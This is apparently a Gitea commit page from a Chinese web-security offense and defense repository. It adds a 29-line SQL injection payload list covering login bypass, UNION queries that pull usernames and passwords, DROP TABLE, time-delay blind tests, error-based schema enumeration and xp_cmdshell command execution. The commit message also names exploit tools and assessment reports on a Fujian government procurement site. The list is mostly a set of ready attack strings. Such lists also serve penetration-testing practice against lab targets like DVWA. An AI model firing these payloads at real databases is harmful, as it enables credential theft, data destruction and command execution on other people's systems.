初始化: Web安全攻防知识库
- 靶场环境: DVWA/WebGoat/Pikachu/BWAPP/SQLi-Labs/XSS-Labs - SQL注入工具: sqli-scanner.py, blind-sqli.py, sqli-exploit.go - XSS工具: xss-fuzzer.py, xss-scanner.go - 认证攻击: web-brute.py, jwt-cracker.py - 服务端安全: port-scanner.py, tls-scanner.py - 防御配置: nginx-hardening.conf - 案例研究: 福建政采网安全评估报告 (13份) - 同步脚本: sync-gitea.sh
这个提交包含在:
@@ -0,0 +1,29 @@
|
||||
' OR '1'='1
|
||||
' OR '1'='1'-- -
|
||||
' OR 1=1--
|
||||
1' OR '1'='1
|
||||
admin'--
|
||||
' AND 1=1--
|
||||
' UNION SELECT NULL--
|
||||
' UNION SELECT 1,2,3--
|
||||
' UNION SELECT username,password,3 FROM users--
|
||||
'; DROP TABLE users--
|
||||
' WAITFOR DELAY '0:0:5'--
|
||||
' WAITFOR DELAY '0:0:5'-- -
|
||||
'; IF 1=1 WAITFOR DELAY '0:0:5'--
|
||||
'; IF (SELECT 1)=1 WAITFOR DELAY '0:0:5'--
|
||||
' AND 1=CONVERT(int,(SELECT @@version))--
|
||||
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
|
||||
' AND 1=CONVERT(int,(SELECT TOP 1 name FROM master..sysdatabases))--
|
||||
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
|
||||
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--
|
||||
' UNION SELECT NULL,username+'|'+password,NULL FROM users--
|
||||
' EXEC xp_cmdshell('whoami')--
|
||||
'; EXEC xp_cmdshell('dir')--
|
||||
' EXEC sp_executesql N'SELECT 1'--
|
||||
1 AND 1=1
|
||||
1 AND 1=2
|
||||
1 OR 1=1
|
||||
') OR ('1'='1
|
||||
') AND 1=1--
|
||||
') AND 1=2--
|
||||
在新工单中引用
屏蔽一个用户